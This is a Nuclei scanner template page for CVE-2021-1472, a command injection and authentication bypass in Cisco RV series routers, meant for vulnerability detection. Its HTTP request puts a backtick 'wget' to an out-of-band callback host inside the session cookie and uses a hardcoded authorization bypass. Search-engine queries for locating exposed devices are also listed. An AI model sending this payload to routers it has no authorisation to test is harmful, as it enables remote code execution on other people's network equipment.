Skip to content
Nuclei Templates

Cisco Small Business RV Series - OS Command Injection

ID: CVE-2021-1472

Severity: critical

Author: gy741

Tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive

Description

Section titled “Description”

Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.

YAML Source

Section titled “YAML Source”
id: CVE-2021-1472


info:
  name: Cisco Small Business RV Series - OS Command Injection
  author: gy741
  severity: critical
  description: |
    Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device.
  remediation: |
    Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability.
  reference:
    - https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
    - https://packetstormsecurity.com/files/162238/Cisco-RV-Authentication-Bypass-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1472
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1473
    - http://seclists.org/fulldisclosure/2021/Apr/39
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-1472
    cwe-id: CWE-287,CWE-119
    epss-score: 0.97174
    epss-percentile: 0.99793
    cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: rv160_firmware
    shodan-query:
      - http.html:"Cisco rv340"
      - http.html:"cisco rv340"
    fofa-query: body="cisco rv340"
  tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive


http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Cookie: sessionid='`wget http://{{interactsh-url}}`'
        Authorization: QUt6NkpTeTE6dmk4cW8=
        Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536


        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="option"


        5NW9Cw1J
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="destination"


        J0I5k131j2Ku
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="file.path"


        EKsmqqg0
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="file"; filename="config.xml"
        Content-Type: application/xml


        qJ57CM9
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="filename"


        JbYXJR74n.xml
        -----------------------------392306610282184777655655237536
        Content-Disposition: form-data; name="GXbLINHYkFI"


        <input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>
        -----------------------------392306610282184777655655237536--


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http


      - type: word
        part: body
        words:
          - '"jsonrpc":'
# digest: 4b0a00483046022100807ff5f85ac3609da48acf4d625b3de19ea99fb13ecf8d3a6bd0ed1252d212f6022100ee7d26e4b402e3d2fc266cf50d8499bd49ab7582b43b0a5c36604974a3e95a2f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-1472.yaml"

View on Github